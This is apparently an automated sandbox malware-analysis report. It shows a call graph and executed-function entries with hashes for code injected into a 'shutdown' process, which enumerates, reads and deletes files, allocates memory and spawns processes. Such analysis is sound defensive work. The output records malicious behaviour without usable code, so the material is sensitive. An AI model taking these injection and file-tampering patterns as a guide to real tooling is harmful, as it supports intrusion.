                      execution_graph 99792 3239720 99793 323972f 99792->99793 99794 3239770 99793->99794 99795 323975d CreateThread 99793->99795 99796 324fb20 99797 324fb3d 99796->99797 99800 32448d0 99797->99800 99799 324fb5b 99801 32448f4 99800->99801 99802 32448fb 99801->99802 99803 3244930 LdrLoadDll 99801->99803 99802->99799 99803->99802 99804 3258160 99805 32581f9 99804->99805 99807 3258181 99804->99807 99806 325820f NtReadFile 99805->99806 99808 32577a0 99809 3257821 99808->99809 99810 32577c1 99808->99810 99813 39b2ee0 LdrInitializeThunk 99809->99813 99811 3257852 99813->99811 99814 325b2e0 99817 325a1a0 99814->99817 99820 3258630 99817->99820 99819 325a1b9 99821 325864a 99820->99821 99822 325865b RtlFreeHeap 99821->99822 99822->99819 99823 39b2ad0 LdrInitializeThunk 99824 3242b6a 99825 3242b98 99824->99825 99828 32463f0 99825->99828 99827 3242ba3 99830 3246423 99828->99830 99829 3246447 99829->99827 99830->99829 99835 3257e60 99830->99835 99832 324646a 99832->99829 99839 32582d0 99832->99839 99834 32464ea 99834->99827 99836 3257e7a 99835->99836 99842 39b2ca0 LdrInitializeThunk 99836->99842 99837 3257ea6 99837->99832 99840 32582ed 99839->99840 99841 32582fe NtClose 99840->99841 99841->99834 99842->99837 99843 324f2b5 99844 324f314 99843->99844 99845 32463f0 2 API calls 99844->99845 99847 324f43d 99845->99847 99846 324f444 99847->99846 99872 3246500 99847->99872 99849 324f5e3 99850 324f4c0 99850->99849 99851 324f5f2 99850->99851 99876 324f090 99850->99876 99852 32582d0 NtClose 99851->99852 99854 324f5fc 99852->99854 99855 324f4f5 99855->99851 99856 324f500 99855->99856 99885 325a280 99856->99885 99858 324f529 99859 324f532 99858->99859 99860 324f548 99858->99860 99862 32582d0 NtClose 99859->99862 99888 324ef80 CoInitialize 99860->99888 99863 324f53c 99862->99863 99864 324f556 99890 3257db0 99864->99890 99866 324f5d2 99867 32582d0 NtClose 99866->99867 99868 324f5dc 99867->99868 99869 325a1a0 RtlFreeHeap 99868->99869 99869->99849 99870 324f574 99870->99866 99871 3257db0 LdrInitializeThunk 99870->99871 99871->99870 99873 3246525 99872->99873 99894 3257c40 99873->99894 99877 324f0ac 99876->99877 99878 32448d0 LdrLoadDll 99877->99878 99880 324f0ca 99878->99880 99879 324f0d3 99879->99855 99880->99879 99881 32448d0 LdrLoadDll 99880->99881 99882 324f19e 99881->99882 99883 32448d0 LdrLoadDll 99882->99883 99884 324f1f8 99882->99884 99883->99884 99884->99855 99899 32585e0 99885->99899 99887 325a29b 99887->99858 99889 324efe5 99888->99889 99889->99864 99891 3257dcd 99890->99891 99902 39b2ba0 LdrInitializeThunk 99891->99902 99892 3257dfd 99892->99870 99895 3257c5a 99894->99895 99898 39b2c60 LdrInitializeThunk 99895->99898 99896 3246599 99896->99850 99898->99896 99900 32585fd 99899->99900 99901 325860e RtlAllocateHeap 99900->99901 99901->99887 99902->99892 99903 324aab0 99908 324a7e0 99903->99908 99905 324aabd 99923 324a480 99905->99923 99907 324aad9 99909 324a805 99908->99909 99935 3248180 99909->99935 99912 324a942 99912->99905 99914 324a959 99914->99905 99916 324aa41 99920 324aa99 99916->99920 99965 324a240 99916->99965 99917 324a950 99917->99914 99917->99916 99950 32525e0 99917->99950 99954 3249ee0 99917->99954 99921 325a1a0 RtlFreeHeap 99920->99921 99922 324aaa0 99921->99922 99922->99905 99924 324a496 99923->99924 99927 324a4a1 99923->99927 99925 325a280 RtlAllocateHeap 99924->99925 99925->99927 99926 324a4b7 99926->99907 99927->99926 99928 3248180 GetFileAttributesW 99927->99928 99929 324a7ae 99927->99929 99932 32525e0 2 API calls 99927->99932 99933 3249ee0 3 API calls 99927->99933 99934 324a240 3 API calls 99927->99934 99928->99927 99930 324a7c7 99929->99930 99931 325a1a0 RtlFreeHeap 99929->99931 99930->99907 99931->99930 99932->99927 99933->99927 99934->99927 99936 32481a1 99935->99936 99937 32481a8 GetFileAttributesW 99936->99937 99938 32481b3 99936->99938 99937->99938 99938->99912 99939 3252740 99938->99939 99940 325274e 99939->99940 99941 3252755 99939->99941 99940->99917 99942 32448d0 LdrLoadDll 99941->99942 99943 325278a 99942->99943 99944 3252799 99943->99944 99971 3252210 LdrLoadDll 99943->99971 99946 325a280 RtlAllocateHeap 99944->99946 99949 3252931 99944->99949 99947 32527b2 99946->99947 99948 325a1a0 RtlFreeHeap 99947->99948 99947->99949 99948->99949 99949->99917 99951 32525f6 99950->99951 99953 32526f6 99950->99953 99951->99953 99972 32547c0 99951->99972 99953->99917 99955 3249f06 99954->99955 99956 32547c0 2 API calls 99955->99956 99957 3249f62 99956->99957 99987 324d700 99957->99987 99959 3249f6d 99961 324a0f0 99959->99961 99962 3249f8b 99959->99962 99960 324a0d5 99960->99917 99961->99960 99963 3249da0 RtlFreeHeap 99961->99963 99962->99960 99997 3249da0 99962->99997 99963->99961 99966 324a266 99965->99966 99967 32547c0 2 API calls 99966->99967 99968 324a2d7 99967->99968 99969 324d700 3 API calls 99968->99969 99970 324a2e2 99969->99970 99970->99916 99971->99944 99974 325481d 99972->99974 99973 3254854 99973->99951 99974->99973 99977 3251190 99974->99977 99976 3254836 99976->99951 99978 3251198 99977->99978 99981 32510fa 99977->99981 99978->99976 99979 3251168 99979->99976 99980 3251134 99982 32582d0 NtClose 99980->99982 99981->99979 99981->99980 99983 32582d0 NtClose 99981->99983 99986 325a2c0 RtlAllocateHeap 99981->99986 99984 325113d 99982->99984 99983->99981 99984->99976 99986->99981 99988 32547c0 2 API calls 99987->99988 99989 324d716 99988->99989 99990 324d720 99989->99990 99991 32547c0 2 API calls 99989->99991 99990->99959 99992 324d731 99991->99992 99992->99990 99993 32547c0 2 API calls 99992->99993 99994 324d74c 99993->99994 99995 325a1a0 RtlFreeHeap 99994->99995 99996 324d759 99995->99996 99996->99959 99998 3249db6 99997->99998 100001 324d770 99998->100001 100000 3249ebc 100000->99962 100002 324d794 100001->100002 100003 324d82c 100002->100003 100004 325a1a0 RtlFreeHeap 100002->100004 100003->100000 100004->100003 100010 32434fc 100015 3247bb0 100010->100015 100012 3243521 100014 32582d0 NtClose 100014->100012 100016 324350c 100015->100016 100017 3247bca 100015->100017 100016->100012 100016->100014 100021 32579f0 100017->100021 100020 32582d0 NtClose 100020->100016 100022 3257a0d 100021->100022 100025 39b35c0 LdrInitializeThunk 100022->100025 100023 3247c9a 100023->100020 100025->100023 100026 323b900 100029 325a110 100026->100029 100028 323cf71 100032 3258420 100029->100032 100031 325a141 100031->100028 100033 32584aa 100032->100033 100035 3258444 100032->100035 100034 32584c0 NtAllocateVirtualMemory 100033->100034 100034->100031 100035->100031 100036 3239780 100037 3239c47 100036->100037 100039 323a1fb 100037->100039 100040 3259e30 100037->100040 100041 3259e56 100040->100041 100046 3234020 100041->100046 100043 3259e62 100045 3259e90 100043->100045 100049 3254910 100043->100049 100045->100039 100053 3243600 100046->100053 100048 323402d 100048->100043 100050 325496a 100049->100050 100052 3254977 100050->100052 100073 3241ad0 100050->100073 100052->100045 100054 3243617 100053->100054 100056 3243630 100054->100056 100057 3258d10 100054->100057 100056->100048 100058 3258d28 100057->100058 100059 32547c0 2 API calls 100058->100059 100061 3258d43 100059->100061 100060 3258d4c 100060->100056 100061->100060 100066 3257950 100061->100066 100064 325a1a0 RtlFreeHeap 100065 3258dba 100064->100065 100065->100056 100067 325796d 100066->100067 100070 39b2c0a 100067->100070 100068 3257999 100068->100064 100071 39b2c1f LdrInitializeThunk 100070->100071 100072 39b2c11 100070->100072 100071->100068 100072->100068 100074 3241b0b 100073->100074 100097 3247cc0 100074->100097 100076 3241b13 100077 3241dc5 100076->100077 100078 325a280 RtlAllocateHeap 100076->100078 100077->100052 100079 3241b29 100078->100079 100080 325a280 RtlAllocateHeap 100079->100080 100081 3241b37 100080->100081 100082 325a280 RtlAllocateHeap 100081->100082 100083 3241b48 100082->100083 100108 3245f40 100083->100108 100085 3241b55 100086 32547c0 2 API calls 100085->100086 100089 3241b9f 100085->100089 100087 3241b6f 100086->100087 100088 32547c0 2 API calls 100087->100088 100090 3241b80 100088->100090 100096 3241bcb 100089->100096 100118 3246b40 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100089->100118 100090->100089 100092 32547c0 2 API calls 100090->100092 100092->100089 100093 32448d0 LdrLoadDll 100094 3241d82 100093->100094 100114 3257030 100094->100114 100096->100093 100098 3247cec 100097->100098 100099 3247bb0 2 API calls 100098->100099 100100 3247d0f 100099->100100 100101 3247d19 100100->100101 100103 3247d31 100100->100103 100104 32582d0 NtClose 100101->100104 100105 3247d24 100101->100105 100102 3247d4d 100102->100076 100103->100102 100106 32582d0 NtClose 100103->100106 100104->100105 100105->100076 100107 3247d43 100106->100107 100107->100076 100109 3245f53 100108->100109 100111 3245f5d 100108->100111 100109->100085 100110 3246030 100110->100085 100111->100110 100112 32547c0 2 API calls 100111->100112 100113 32460ac 100112->100113 100113->100085 100115 325708a 100114->100115 100116 3257097 100115->100116 100119 3241de0 100115->100119 100116->100077 100118->100096 100137 3247f90 100119->100137 100121 32422d8 100121->100116 100122 3241e00 100122->100121 100141 3250ad0 100122->100141 100125 3241ffe 100149 325b3b0 100125->100149 100127 3241e5e 100127->100121 100144 325b280 100127->100144 100129 3254b50 15 API calls 100132 324203e 100129->100132 100130 3242013 100130->100132 100155 3240a90 100130->100155 100132->100121 100132->100129 100134 3240a90 LdrInitializeThunk 100132->100134 100162 3247f30 100132->100162 100133 3247f30 LdrInitializeThunk 100136 3242169 100133->100136 100134->100132 100136->100132 100136->100133 100158 3254b50 100136->100158 100138 3247f9d 100137->100138 100139 3247fc5 100138->100139 100140 3247fbe SetErrorMode 100138->100140 100139->100122 100140->100139 100142 325a110 NtAllocateVirtualMemory 100141->100142 100143 3250af1 100142->100143 100143->100127 100145 325b296 100144->100145 100146 325b290 100144->100146 100147 325a280 RtlAllocateHeap 100145->100147 100146->100125 100148 325b2bc 100147->100148 100148->100125 100150 325b320 100149->100150 100151 325b37d 100150->100151 100152 325a280 RtlAllocateHeap 100150->100152 100151->100130 100153 325b35a 100152->100153 100154 325a1a0 RtlFreeHeap 100153->100154 100154->100151 100156 3240ab2 100155->100156 100166 3258540 100155->100166 100156->100136 100159 3254baa 100158->100159 100161 3254bbb 100159->100161 100171 32475c0 100159->100171 100161->100136 100163 3247f43 100162->100163 100248 3257860 100163->100248 100165 3247f6e 100165->100132 100167 325855d 100166->100167 100170 39b2c70 LdrInitializeThunk 100167->100170 100168 3258585 100168->100156 100170->100168 100172 32475d6 100171->100172 100174 32475e4 100171->100174 100172->100161 100183 3247653 100174->100183 100184 3247400 100174->100184 100176 32476ab 100176->100161 100177 3247685 100177->100176 100192 3252a00 LdrLoadDll GetFileAttributesW RtlAllocateHeap RtlFreeHeap 100177->100192 100181 3247636 100182 32547c0 2 API calls 100181->100182 100181->100183 100182->100183 100183->100177 100191 3246e00 NtClose RtlAllocateHeap LdrInitializeThunk LdrInitializeThunk 100183->100191 100185 3247415 100184->100185 100189 324746f 100184->100189 100185->100189 100193 324ad10 100185->100193 100187 3247459 100187->100189 100199 324afa0 100187->100199 100189->100176 100190 3247240 NtClose RtlAllocateHeap LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100189->100190 100190->100181 100191->100177 100192->100176 100194 324ad35 100193->100194 100195 32547c0 2 API calls 100194->100195 100197 324aea2 100195->100197 100196 324af61 100196->100187 100197->100196 100198 32547c0 2 API calls 100197->100198 100198->100196 100200 324afc6 100199->100200 100201 324b1e2 100200->100201 100226 32586c0 100200->100226 100201->100189 100203 324b03c 100203->100201 100204 325b3b0 2 API calls 100203->100204 100205 324b058 100204->100205 100205->100201 100206 324b126 100205->100206 100207 3257950 LdrInitializeThunk 100205->100207 100208 3245b00 LdrInitializeThunk 100206->100208 100210 324b145 100206->100210 100209 324b0b1 100207->100209 100208->100210 100209->100206 100212 324b0ba 100209->100212 100225 324b1ca 100210->100225 100232 3257520 100210->100232 100211 324b10e 100214 3247f30 LdrInitializeThunk 100211->100214 100212->100201 100212->100211 100213 324b0ec 100212->100213 100229 3245b00 100212->100229 100247 3253b10 LdrInitializeThunk 100213->100247 100218 324b11c 100214->100218 100218->100189 100219 3247f30 LdrInitializeThunk 100221 324b1d8 100219->100221 100220 324b1a1 100237 32575c0 100220->100237 100221->100189 100223 324b1bb 100242 3257700 100223->100242 100225->100219 100227 32586dd 100226->100227 100228 32586ee CreateProcessInternalW 100227->100228 100228->100203 100230 3257b10 LdrInitializeThunk 100229->100230 100231 3245b3e 100230->100231 100231->100213 100233 325758f 100232->100233 100235 3257541 100232->100235 100236 39b39b0 LdrInitializeThunk 100233->100236 100234 32575b4 100234->100220 100235->100220 100236->100234 100238 325762f 100237->100238 100240 32575e1 100237->100240 100241 39b4340 LdrInitializeThunk 100238->100241 100239 3257654 100239->100223 100240->100223 100241->100239 100243 325776f 100242->100243 100244 3257721 100242->100244 100246 39b2fb0 LdrInitializeThunk 100243->100246 100244->100225 100245 3257794 100245->100225 100246->100245 100247->100211 100249 32578d0 100248->100249 100251 3257881 100248->100251 100253 39b2dd0 LdrInitializeThunk 100249->100253 100250 32578f5 100250->100165 100251->100165 100253->100250 100254 3245b80 100255 3247f30 LdrInitializeThunk 100254->100255 100256 3245bb0 100254->100256 100255->100256 100258 3245bdc 100256->100258 100259 3247eb0 100256->100259 100260 3247ef4 100259->100260 100265 3247f15 100260->100265 100266 3257660 100260->100266 100262 3247f05 100263 3247f21 100262->100263 100264 32582d0 NtClose 100262->100264 100263->100256 100264->100265 100265->100256 100267 32576d2 100266->100267 100268 3257684 100266->100268 100271 39b4650 LdrInitializeThunk 100267->100271 100268->100262 100269 32576f7 100269->100262 100271->100269 100272 324c240 100274 324c269 100272->100274 100273 324c36d 100274->100273 100275 324c313 FindFirstFileW 100274->100275 100275->100273 100279 324c32e 100275->100279 100276 324c354 FindNextFileW 100278 324c366 FindClose 100276->100278 100276->100279 100278->100273 100279->100276 100280 324c150 NtClose RtlAllocateHeap 100279->100280 100280->100279 100281 3246e80 100282 3246ea7 100281->100282 100285 3247d60 100282->100285 100284 3246ece 100286 3247d7d 100285->100286 100292 3257a40 100286->100292 100288 3247dcd 100289 3247dd4 100288->100289 100297 3257b10 100288->100297 100289->100284 100291 3247dfd 100291->100284 100293 3257acd 100292->100293 100295 3257a61 100292->100295 100302 39b2f30 LdrInitializeThunk 100293->100302 100294 3257b06 100294->100288 100295->100288 100298 3257baf 100297->100298 100300 3257b31 100297->100300 100303 39b2d10 LdrInitializeThunk 100298->100303 100299 3257bf4 100299->100291 100300->100291 100302->100294 100303->100299 100304 3257900 100305 325791d 100304->100305 100308 39b2df0 LdrInitializeThunk 100305->100308 100306 3257945 100308->100306 100319 3258000 100320 32580ac 100319->100320 100322 3258028 100319->100322 100321 32580c2 NtCreateFile 100320->100321 100323 3258240 100324 32582a9 100323->100324 100326 3258261 100323->100326 100325 32582bf NtDeleteFile 100324->100325 100327 3251480 100328 325148f 100327->100328 100329 32547c0 2 API calls 100328->100329 100333 32514a8 100329->100333 100330 32514d3 100331 325a1a0 RtlFreeHeap 100330->100331 100332 32514e0 100331->100332 100333->100330 100334 325150e 100333->100334 100336 3251513 100333->100336 100335 325a1a0 RtlFreeHeap 100334->100335 100335->100336 100337 324860e 100338 3248613 100337->100338 100339 32547c0 2 API calls 100338->100339 100340 324861e 100339->100340 100342 32485d2 100340->100342 100343 3247090 NtClose RtlAllocateHeap LdrInitializeThunk LdrInitializeThunk 100340->100343 100343->100342 100345 3240f10 100346 3240f2a 100345->100346 100347 32448d0 LdrLoadDll 100346->100347 100348 3240f48 100347->100348 100349 3240f7c PostThreadMessageW 100348->100349 100350 3240f8d 100348->100350 100349->100350 100351 3245c10 100352 3257950 LdrInitializeThunk 100351->100352 100353 3245c46 100352->100353 100356 3258360 100353->100356 100355 3245c5b 100357 32583e4 100356->100357 100358 3258384 100356->100358 100361 39b2e80 LdrInitializeThunk 100357->100361 100358->100355 100359 3258415 100359->100355 100361->100359 100362 32552d0 100363 325532a 100362->100363 100365 3255337 100363->100365 100366 3252e50 100363->100366 100367 325a110 NtAllocateVirtualMemory 100366->100367 100368 3252e8e 100367->100368 100369 32448d0 LdrLoadDll 100368->100369 100371 3252f96 100368->100371 100372 3252ed4 100369->100372 100370 3252f10 Sleep 100370->100372 100371->100365 100372->100370 100372->100371 100375 32499db 100376 32499ea 100375->100376 100377 32499f1 100376->100377 100378 325a1a0 RtlFreeHeap 100376->100378 100378->100377

                      Executed Functions

                      Function 0324C240 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0324C324
                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0324C35F
                      • FindClose.KERNELBASE(?), ref: 0324C36A
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNext
                      • String ID:
                      • API String ID: 3541575487-0
                      • Opcode ID: eef4da17557448ca6832a932d7ade93aad66fc5e93c18e0207f45e7ff0ca740a
                      • Instruction ID: 78be85fda6ab5dd65ad9e1648470d1ce04b8a91cfeb6add3d419cb90ea107414
                      • Opcode Fuzzy Hash: eef4da17557448ca6832a932d7ade93aad66fc5e93c18e0207f45e7ff0ca740a
                      • Instruction Fuzzy Hash: B13178759103197BDB24EF64CC85FEF777C9F44B04F144558F909AB180E6B06AD58BA0
                      Function 03258000 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 032580F3
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 54a4c731f85f314922f31301092951ec258779c6e92f03241f429952f0e43ebd
                      • Instruction ID: 3cc47008f9df08df514b80fef85ccbb43623002924fed6a925f25bf4b5a40244
                      • Opcode Fuzzy Hash: 54a4c731f85f314922f31301092951ec258779c6e92f03241f429952f0e43ebd
                      • Instruction Fuzzy Hash: 6231C1B5A11209AFCB04DF98D881EEFB7F9AF8D314F108219FD19A7240D770A951CBA5
                      Function 03258160 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03258238
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 5a5ca1f3219d6b66a543da58c95699784618ab15eaeb429c4cb0431a847574ee
                      • Instruction ID: 705f38e655bbb71963495bda1ae8dc379fe1ff3673c2ba90f7d8e975f6405c1e
                      • Opcode Fuzzy Hash: 5a5ca1f3219d6b66a543da58c95699784618ab15eaeb429c4cb0431a847574ee
                      • Instruction Fuzzy Hash: 573104B5A10209AFCB04DF99D881EEFB7B9EF8C314F108219FD09A7240D770A951CBA5
                      Function 03258420 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtAllocateVirtualMemory.NTDLL(03241E5E,?,03257097,00000000,00000004,00003000,?,?,?,?,?,03257097,03241E5E,?,03250AF1,03257097), ref: 032584DD
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID:
                      • API String ID: 2167126740-0
                      • Opcode ID: 7e87e8177d1e0f840cad00dcad60a18a42444f463050a49184e836b06b9d95c5
                      • Instruction ID: ddd0989f9b94025bcc05ef6b558f6ead3a61069d6dbd21ddf73b84344da59f6e
                      • Opcode Fuzzy Hash: 7e87e8177d1e0f840cad00dcad60a18a42444f463050a49184e836b06b9d95c5
                      • Instruction Fuzzy Hash: AA210AB5A10209AFDB14DF58DC81FEFB7A9EF89310F008109FD09A7240D771A951CBA5
                      Function 03258240 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: DeleteFile
                      • String ID:
                      • API String ID: 4033686569-0
                      • Opcode ID: efeccf29bc52bc84f90cd12cac055aaec4c922ac01c5b6e44b1802c59529b91c
                      • Instruction ID: 5acba0b529baa8d5813689f241773c0cda5feb00476aa49c2c52a3ba797fa8cd
                      • Opcode Fuzzy Hash: efeccf29bc52bc84f90cd12cac055aaec4c922ac01c5b6e44b1802c59529b91c
                      • Instruction Fuzzy Hash: 4D01C076621704BFD620EBA8DC41FAB73ACDF86710F104549FE199B180D7B17A50C7A2
                      Function 032582D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                      Download Yara Rule
                      APIs
                      • NtClose.NTDLL(03251151,?,00009E5D,E5B4FE69,?,03251151,E5B4FE69,?,?,?,?,?,?,?,?,00000000), ref: 03258307
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, Offset: 03230000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3230000_shutdown.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction ID: 7047e3ac1d69525fb0ab68e192b23a0a488cdcf3cfaa36943472226d39a7adb3
                      • Opcode Fuzzy Hash: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction Fuzzy Hash: C2E04F75240604BBD220EA59CC00F9BB76CEBC6751F008419FA0AAB241CA71BA5186E4
                      Function 039B4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a34c70ea1242fe270806255e29f0a259658e8507b4d1c7230fbfe284e09d127e
                      • Instruction ID: b77917f754a632f11f0b4d5b70cdeefd56f3b3f825c10f597cbe2dc265ee026c
                      • Opcode Fuzzy Hash: a34c70ea1242fe270806255e29f0a259658e8507b4d1c7230fbfe284e09d127e
                      • Instruction Fuzzy Hash: 4990023161994412A140B1594888546404997E0301B55C015E0424554C8B158A565362
                      Function 039B4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 66c30fff003a0b2079499c130980c4125df70122aa2ca0fa8ddd2b7206a7d08a
                      • Instruction ID: 6d70d5cb77546cb26bafceaf629274e75d187482b00aba7c31f2a87ceb259ddc
                      • Opcode Fuzzy Hash: 66c30fff003a0b2079499c130980c4125df70122aa2ca0fa8ddd2b7206a7d08a
                      • Instruction Fuzzy Hash: 0F900261615644425140B1594808406604997E1301395C119A0554560C87198955926A
                      Function 039B2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 4e964da6ba945d9b08bf43441970b476a113b96433bd80fd64c3fc6cf7b6d2a5
                      • Instruction ID: b9a50f3711e9077626035d4ee99278ef58f89e484e7874b3f96e854d94e7681f
                      • Opcode Fuzzy Hash: 4e964da6ba945d9b08bf43441970b476a113b96433bd80fd64c3fc6cf7b6d2a5
                      • Instruction Fuzzy Hash: 6990023161954C02E150B1594418746004987D0301F55C015A0024654D87568B5576A2
                      Function 039B2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 0e9fd912f6a67e909cdbc01da87f99845d8c9767fc7e746586e4c29a1c1ff606
                      • Instruction ID: 99332dc8138ce153a33198dc0373b026f578ed92a572240ac72dc1a246b97a1c
                      • Opcode Fuzzy Hash: 0e9fd912f6a67e909cdbc01da87f99845d8c9767fc7e746586e4c29a1c1ff606
                      • Instruction Fuzzy Hash: 2390023121554C02E180B159440864A004987D1301F95C019A0025654DCB168B5977A2
                      Function 039B2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_3940000_shutdown.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 2e7c587d0bafe054845700796d3f18ea2f8f28aff36e112b1fb8bb92eea07c93
                      • Instruction ID: 88079672beae60e27cb727295c0c74702cd1c97b7f5c0e527ea598b87406dced
                      • Opcode Fuzzy Hash: 2e7c587d0bafe054845700796d3f18ea2f8f28aff36e112b1fb8bb92eea07c93
                      • Instruction Fuzzy Hash: E390023121958C42E140B1594408A46005987D0305F55C015A0064694D97268E55B662
                      Function 039B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp, Offset: 03940000, based on PE: true
                      • Associated: 0000000D.00000002.2564318778.0000000003A69000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
